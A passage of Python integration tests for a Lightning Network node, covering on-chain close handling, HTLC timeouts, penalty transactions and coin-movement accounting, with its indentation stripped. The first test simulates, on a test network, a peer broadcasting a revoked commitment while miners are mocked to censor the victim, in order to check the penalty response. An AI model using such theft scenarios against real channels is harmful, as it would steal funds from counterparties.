l2.rpc.dev_reenable_commit(l1.info['id'])
# Wait for the fulfilment.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now payment should complete.
t.result(timeout=10)
# l1 goes offline and bribes the miners to censor transactions from l2.
l1.rpc.stop()
def censoring_sendrawtx(r):
return {'id': r['id'], 'result': {}}
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', censoring_sendrawtx)
# l1 now performs the theft attack!
bitcoind.rpc.sendrawtransaction(theft_tx)
bitcoind.generate_block(1)
# l2 notices.
l2.daemon.wait_for_log(' to ONCHAIN')
def get_rbf_tx(self, depth, name, resolve):
r = self.daemon.wait_for_log('Broadcasting RBF {} .* to resolve {} depth={}'
.format(name, resolve, depth))
return re.search(r'.* \(([0-9a-fA-F]*)\)', r).group(1)
rbf_txes = []
# Now the censoring miners generate some blocks.
for depth in range(2, 10):
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# l2 should RBF, twice even, one for the l1 main output,
# one for the l1 HTLC output.
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC'))
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM'))
# Now that the transactions have high fees, independent miners
# realize they can earn potentially more money by grabbing the
# high-fee censored transactions, and fresh, non-censoring
# hashpower arises, evicting the censor.
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', None)
# Check that the last two txes can be broadcast.
# These should donate the total amount to miners.
rbf_txes = rbf_txes[-2:]
for tx in rbf_txes:
l2.rpc.call('sendrawtransaction', [tx, True])
# Now the non-censoring miners overpower the censoring miners.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# And l2 should consider it resolved now.
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX')
# l2 donated it to the miners, so it owns nothing
assert(len(l2.rpc.listfunds()['outputs']) == 0)
assert account_balance(l2, channel_id) == 0
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('cid1', ['penalty'], ['to_miner'], 'C'), ('cid1', ['penalty'], ['to_miner'], 'D')],
}
if anchor_expected():
expected_2['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
check_utxos_channel(l2, [channel_id], expected_2)
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_first_commit(node_factory, bitcoind):
"""Onchain handling where opener immediately drops to chain"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails just after funding.
disconnects = ['+WIRE_FUNDING_LOCKED', 'permfail']
# Make locktime different, as we once had them reversed!
l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': disconnects,
'plugin': coin_mvt_plugin},
{'watchtime-blocks': 10,
'plugin': coin_mvt_plugin}],
fundchannel=False)
l1.fundwallet(10**7)
l1.rpc.fundchannel(l2.info['id'], 10**6)
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_unwatch(node_factory, bitcoind):
"""Onchaind should not watch random spends"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2 = node_factory.line_graph(2, opts={'plugin': coin_mvt_plugin})
channel_id = first_channel_id(l1, l2)
l1.pay(l2, 200000000)
l1.rpc.dev_fail(l2.info['id'])
l1.daemon.wait_for_log('Failing due to dev-fail command')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# First time it sees it, onchaind cares.
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal '
'OUR_DELAYED_RETURN_TO_WALLET')
# Now test unrelated onchain churn.
# Daemon gets told about wallet; says it doesn't care.
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
l1.daemon.wait_for_log("but we don't care")
# And lightningd should respect that!
assert not l1.daemon.is_in_log("Can't unwatch txid")
# So these should not generate further messages
for i in range(5):
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
# Make sure it digests the block
sync_blockheight(bitcoind, [l1])
# We won't see this again.
assert not l1.daemon.is_in_log("but we don't care",
start=l1.daemon.logsearch_start)
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# Note: for this test we leave onchaind running, so we can detect
# any leaks!
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchaind_replay(node_factory, bitcoind):
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2, opts=[{'watchtime-blocks': 201, 'cltv-delta': 101,
'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500)},
{'watchtime-blocks': 201, 'cltv-delta': 101}])
inv = l2.rpc.invoice(10**8, 'onchaind_replay', 'desc')
rhash = inv['payment_hash']
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 101,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1, wait_for_mempool=1)
# Wait for nodes to notice the failure, this seach needle is after the
# DB commit so we're sure the tx entries in onchaindtxs have been added
l1.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
l2.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
# We should at least have the init tx now
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
assert len(l2.db_query("SELECT * FROM channeltxs;")) > 0
# Generate some blocks so we restart the onchaind from DB (we rescan
# last_height - 100)
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l1, l2])
# l1 should still have a running onchaind
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
l2.rpc.stop()
l1.restart()
# Can't wait for it, it's after the "Server started" wait in restart()
assert l1.daemon.is_in_log(r'Restarting onchaind for channel')
# l1 should still notice that the funding was spent and that we should react to it
l1.daemon.wait_for_log("Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET")
sync_blockheight(bitcoind, [l1])
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_dust_out(node_factory, bitcoind, executor):
"""Onchain handling of outgoing dust htlcs (they should fail)"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails after it's irrevocably committed
disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500),
'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Must be dust!
inv = l2.rpc.invoice(1, 'onchain_dust_out', 'desc')
rhash = inv['payment_hash']
routestep = {
'msatoshi': 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: missing in commitment tx'):
payfuture.result(5)
# Retry payment, this should fail (and, as a side-effect, tickle a
# bug).
with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
# 6 later, l1 should collect its to-self payment.
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Restart l1, it should not crash!
l1.restart()
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_dust_out')['invoices'])['status'] == 'unpaid'
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_timeout(node_factory, bitcoind, executor):
"""Onchain handling of outgoing failed htlcs"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails just after it's irrevocably committed
disconnects = ['+WIRE_REVOKE_AND_ACK*3', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500),
'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'], groupid=1)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# Make sure CLTVs are different, in case it confuses onchaind.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1])
# Second one will cause drop to chain.
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'], groupid=2)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 6 blocks'])
bitcoind.generate_block(4)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: timed out'):
payfuture.result(TIMEOUT)
# 2 later, l1 spends HTLC (5 blocks total).
bitcoind.generate_block(2)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 89 later, l2 is done.
bitcoind.generate_block(89)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# Graph of coin_move events we expect
expected_1 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('cid1', ['delayed_to_us'], ['to_wallet'], 'C'), ('cid1', ['htlc_timeout'], ['htlc_timeout'], 'D')],
'C': [('wallet', ['deposit'], None, None)],
'D': [('cid1', ['htlc_tx'], ['to_wallet'], 'E')],
'E': [('wallet', ['deposit'], None, None)]
}
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('external', ['htlc_timeout'], None, None)]
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
# We use a subset of tags in expected_2 that are used in expected_1
tags = check_utxos_channel(l1, [channel_id], expected_1)
# Passing the same tags in to the check again will verify that the
# txids 'unify' across both event sets (in other words, we're talking
# about the same tx's when we say 'A' in each
check_utxos_channel(l2, [channel_id], expected_2, tags)
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_middleman_simple(node_factory, bitcoind):
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2->3, 1->2 goes down after 2 gets preimage from 3.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l1, l2, l3 = node_factory.get_nodes(3, opts=[{'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin,
'disconnect': disconnects},
{}])
# l2 connects to both, so l1 can't reconnect and thus l2 drops to chain
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.fundchannel(l1, 10**6)
c23, _ = l2.fundchannel(l3, 10**6)
channel_id = first_channel_id(l1, l2)
# Make sure routes finalized.
mine_funding_to_announce(bitcoind, [l1, l2, l3])
l1.wait_channel_active(c23)
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
inv = l3.rpc.invoice(10**8, 'middleman', 'desc')
rhash = inv['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash, payment_secret=inv['payment_secret'])
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('OUR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, and spend to-us (any order)
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
# Three more, l2 can spend to-us.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# One more block, HTLC tx is now spendable.
l1.bitcoin.generate_block(1)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l2 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# Graph of coin_move events we expect
expected_2 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
# This is ugly, but this wallet deposit is either unspent or used
# in the next channel open
'A': [('wallet', ['deposit'], ((['withdrawal'], 'F'), (None, None))), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'1': [('wallet', ['deposit'], ['withdrawal'], 'F')],
'B': [('cid1', ['delayed_to_us'], ['to_wallet'], 'C'), ('cid1', ['htlc_fulfill'], ['htlc_fulfill'], 'D'), ('external', ['to_them'], None, None)],
'C': [('wallet', ['deposit'], None, None)],
'D': [('cid1', ['htlc_tx'], ['to_wallet'], 'E')],
'E': [('wallet', ['deposit'], None, None)],
'F': [('wallet', ['deposit'], None, None), ('cid2', ['channel_open', 'opener'], None, None)]
}
expected_1 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('external', ['htlc_fulfill'], ['htlc_fulfill'], 'D'), ('wallet', ['deposit'], None, None)]
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
chan2_id = first_channel_id(l2, l3)
tags = check_utxos_channel(l2, [channel_id, chan2_id], expected_2)
check_utxos_channel(l1, [channel_id, chan2_id], expected_1, tags)
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_middleman_their_unilateral_in(node_factory, bitcoind):
""" This is the same as test_onchain_middleman, except that
node l1 drops to chain, not l2, reversing the unilateral
handling logic """
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1_disconnects = ['=WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l2_disconnects = ['-WIRE_UPDATE_FULFILL_HTLC']
l1, l2, l3 = node_factory.get_nodes(3, opts=[{'plugin': coin_mvt_plugin,
'disconnect': l1_disconnects},
{'plugin': coin_mvt_plugin,
'disconnect': l2_disconnects},
{}])
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
c12, _ = l2.fundchannel(l1, 10**6)
c23, _ = l2.fundchannel(l3, 10**6)
channel_id = first_channel_id(l1, l2)
# Make sure routes finalized.
mine_funding_to_announce(bitcoind, [l1, l2, l3])
l1.wait_channel_active(c23)
# Make sure l3 sees gossip for channel now; it can get upset
# and give bad gossip msg if channel is closed before it sees
# node announcement.
wait_for(lambda: l3.rpc.listchannels(c12)['channels'] != [])
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
inv = l3.rpc.invoice(10**8, 'middleman', 'desc')
rhash = inv['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash, payment_secret=inv['payment_secret'])
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l1 will drop to chain.
l1.daemon.wait_for_log(' to AWAITING_UNILATERAL')
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('THEIR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, immediately
l2.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
l1.bitcoin.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l1 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# Graph of coin_move events we expect
expected_2 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
# This is ugly, but this wallet deposit is either unspent or used
# in the next channel open
'A': [('wallet', ['deposit'], ((['withdrawal'], 'D'), (None, None))), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'1': [('wallet', ['deposit'], ['withdrawal'], 'D')],
'B': [('external', ['to_them'], None, None), ('wallet', ['deposit'], None, None), ('cid1', ['htlc_fulfill'], ['to_wallet'], 'C')],
'C': [('wallet', ['deposit'], None, None)],
'D': [('wallet', ['deposit'], None, None), ('cid2', ['channel_open', 'opener'], None, None)]
}
expected_1 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('external', ['htlc_fulfill'], ['htlc_fulfill'], 'C'), ('cid1', ['delayed_to_us'], ['to_wallet'], 'E')],
'E': [('wallet', ['deposit'], None, None)]
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
chan2_id = first_channel_id(l2, l3)
tags = check_utxos_channel(l2, [channel_id, chan2_id], expected_2)
check_utxos_channel(l1, [channel_id, chan2_id], expected_1, tags)
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_their_unilateral_out(node_factory, bitcoind):
""" Very similar to the test_onchain_middleman, except there's no
middleman, we simply want to check that our offered htlc
on their unilateral returns to us (and is accounted
for correctly) """
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1, l2 = node_factory.line_graph(2, opts=[{'plugin': coin_mvt_plugin},
{'disconnect': disconnects,
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
route = l1.rpc.getroute(l2.info['id'], 10**8, 1)["route"]
assert len(route) == 1
q = queue.Queue()
def try_pay():
try:
# rhash is fake (so is payment_secret)
rhash = 'B1' * 32
l1.rpc.sendpay(route, rhash, payment_secret=rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log(' to AWAITING_UNILATERAL')
l2.daemon.wait_for_log('sendrawtx exit 0')
l2.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC')
# l1 should wait til to_self_delay (10), then fulfill onchain
l2.bitcoin.generate_block(9)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
l2.daemon.wait_for_log('Ignoring output .*_UNILATERAL/THEIR_HTLC')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
# 100 blocks after last spend, l1+l2 should be done.
l2.bitcoin.generate_block(100)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l2, channel_id) == 0
assert account_balance(l1, channel_id) == 0
# Graph of coin_move events we expect
expected_1 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
# This is ugly, but this wallet deposit is either unspent or used
# in the next channel open
'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('wallet', ['deposit'], None, None), ('cid1', ['htlc_timeout'], ['to_wallet'], 'C')],
'C': [('wallet', ['deposit'], None, None)],
}
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('external', ['htlc_timeout'], None, None)],
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
tags = check_utxos_channel(l1, [channel_id], expected_1)
check_utxos_channel(l2, [channel_id], expected_2, tags)
def test_listfunds_after_their_unilateral(node_factory, bitcoind):
"""We keep spending info around for their unilateral closes.
Make sure we show the address.
"""
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# FIXME: We can get warnings from unilteral changes, since we treat
# such errors a soft because LND.
l1, l2 = node_factory.line_graph(2, opts=[{'plugin': coin_mvt_plugin,
"allow_warning": True},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# listfunds will show 1 output change, and channels.
assert len([o for o in l1.rpc.listfunds()['outputs'] if not o['reserved']]) == 1
l1.stop()
l2.rpc.close(l1.info['id'], unilateraltimeout=1)
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(100)
l1.start()
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) == 2)
assert all(['address' in o for o in l1.rpc.listfunds()['outputs']])
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_feechange(node_factory, bitcoind, executor):
"""Onchain handling when we restart with different fees"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1, l2 = node_factory.line_graph(2, opts=[
{
'may_reconnect': True,
'allow_warning': True,
}, {
'may_reconnect': True,
'disconnect': disconnects,
}
])
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash, payment_secret=inv['payment_secret'])
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Make sure that gets included.
bitcoind.generate_block(1)
# Now we restart with different feerates.
l1.stop()
l1.daemon.cmd_line.append('--override-fee-rates=20000/9000/2000')
l1.start()
# We recognize different proposal as ours.
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
# We use 3 blocks for "reasonable depth", so add two more
bitcoind.generate_block(2)
# Note that the very similar test_onchain_timeout looks for a
# different string: that's because it sees the JSONRPC response,
# and due to the l1 restart, there is none here.
l1.daemon.wait_for_log('WIRE_PERMANENT_CHANNEL_FAILURE')
# 90 later, l2 is done
bitcoind.generate_block(89)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 7 blocks and l1 should be done.
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
